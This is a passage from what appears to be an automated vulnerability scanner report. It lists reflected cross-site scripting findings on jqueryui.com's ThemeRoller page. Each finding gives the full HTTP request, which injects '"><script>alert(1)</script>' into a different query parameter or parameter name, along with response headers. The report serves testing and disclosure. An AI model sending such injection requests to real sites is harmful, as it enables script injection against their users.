GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405eb649"><script>alert(1)</script>78dbef2ed8c&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:03 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256
The value of the ffDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12fd4"><script>alert(1)</script>29d7d472bd3 was submitted in the ffDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif12fd4"><script>alert(1)</script>29d7d472bd3&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:57:42 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256
The value of the fsDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4afc"><script>alert(1)</script>59f5feaeb48 was submitted in the fsDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1eme4afc"><script>alert(1)</script>59f5feaeb48&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:57:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256
The value of the fwDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83189"><script>alert(1)</script>49897045505 was submitted in the fwDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold83189"><script>alert(1)</script>49897045505&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:57:42 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120191
The value of the iconColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cdabe"><script>alert(1)</script>92b58c8d02c was submitted in the iconColorActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08cdabe"><script>alert(1)</script>92b58c8d02c&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:09 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256
The value of the iconColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae8b9"><script>alert(1)</script>aee3e277a5 was submitted in the iconColorContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222ae8b9"><script>alert(1)</script>aee3e277a5&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:57:54 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120253
The value of the iconColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82c16"><script>alert(1)</script>7fb96a46603 was submitted in the iconColorDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c0882c16"><script>alert(1)</script>7fb96a46603&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:57:59 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256
The value of the iconColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c249f"><script>alert(1)</script>98f0b51fcf6 was submitted in the iconColorError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27ac249f"><script>alert(1)</script>98f0b51fcf6&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:19 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256
The value of the iconColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5287f"><script>alert(1)</script>c5daa8ea141 was submitted in the iconColorHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff5287f"><script>alert(1)</script>c5daa8ea141&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:57:49 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256
The value of the iconColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1269"><script>alert(1)</script>55ed6b8ddc4 was submitted in the iconColorHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1d1269"><script>alert(1)</script>55ed6b8ddc4&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:14 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256
The value of the iconColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dcb51"><script>alert(1)</script>0aa0fcacc1c was submitted in the iconColorHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08dcb51"><script>alert(1)</script>0aa0fcacc1c&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:04 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256
<meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" /> <meta nam ...[SNIP]... 100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08dcb51"><script>alert(1)</script>0aa0fcacc1c&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png ...[SNIP]...
4.174. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://jqueryui.com
Path: /themeroller/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2a79"><script>alert(1)</script>e2b9c487bc1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?a2a79"><script>alert(1)</script>e2b9c487bc1=1 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:56:52 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 117121
The value of the offsetLeftShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f207"><script>alert(1)</script>b6937b6baad was submitted in the offsetLeftShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px8f207"><script>alert(1)</script>b6937b6baad&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:27 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256
The value of the offsetTopShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c51e"><script>alert(1)</script>866f1ad0c97 was submitted in the offsetTopShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
